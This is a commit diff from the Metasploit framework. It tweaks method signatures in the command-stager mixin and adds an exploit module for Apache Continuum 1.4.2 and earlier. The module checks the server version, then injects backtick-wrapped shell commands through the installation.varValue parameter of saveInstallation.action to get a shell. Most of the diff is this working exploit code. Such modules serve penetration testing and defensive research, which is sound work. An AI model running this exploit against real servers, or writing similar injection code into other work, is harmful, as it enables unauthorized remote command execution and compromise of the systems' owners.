Land rapid7#6962, Apache Continuum Exploit

wwebb-r7 · wwebb-r7 · commit 563b8206c5e8 · 2016-06-13T16:41:53.000-05:00
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
@@ -306,22 +306,22 @@ def compatible_flavor?(f)
   # overriden by a module this mixin.
   #
   # @param opts [Hash] Hash of configuration options.
-  def execute_cmdstager_begin(opts)
+  def execute_cmdstager_begin(opts = {})
   end
 
   # Code to execute after the cmd stager stub. This method is designed to be
   # overriden by a module this mixin.
   #
   # @param opts [Hash] Hash of configuration options.
-  def execute_cmdstager_end(opts)
+  def execute_cmdstager_end(opts = {})
   end
 
   # Code called to execute each command via an arbitrary module-defined vector.
   # This method needs to be overriden by modules using this mixin.
   #
   # @param cmd [String] The command to execute.
   # @param opts [Hash] Hash of configuration options.
-  def execute_command(cmd, opts)
+  def execute_command(cmd, opts = {})
     raise NotImplementedError
   end
 
diff --git a/modules/exploits/linux/http/apache_continuum_cmd_exec.rb b/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Continuum Arbitrary Command Execution',
+      'Description'    => %q{
+        This module exploits a command injection in Apache Continuum <= 1.4.2.
+        By injecting a command into the installation.varValue POST parameter to
+        /continuum/saveInstallation.action, a shell can be spawned.
+      },
+      'Author'         => [
+        'David Shanahan', # Proof of concept
+        'wvu'             # Metasploit module
+      ],
+      'References'     => [
+        %w{EDB 39886}
+      ],
+      'DisclosureDate' => 'Apr 6 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Apache Continuum <= 1.4.2', {}]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/continuum/about.action'
+    )
+
+    if res && res.body.include?('1.4.2')
+      CheckCode::Appears
+    elsif res && res.code == 200
+      CheckCode::Detected
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status('Injecting CmdStager payload...')
+    execute_cmdstager(flavor: :bourne)
+  end
+
+  def execute_command(cmd, opts = {})
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => '/continuum/saveInstallation.action',
+      'vars_post' => {
+        'installation.name'     => Rex::Text.rand_text_alpha(8),
+        'installation.type'     => 'jdk',
+        'installation.varValue' => '`' + cmd + '`'
+      }
+    )
+  end
+
+end
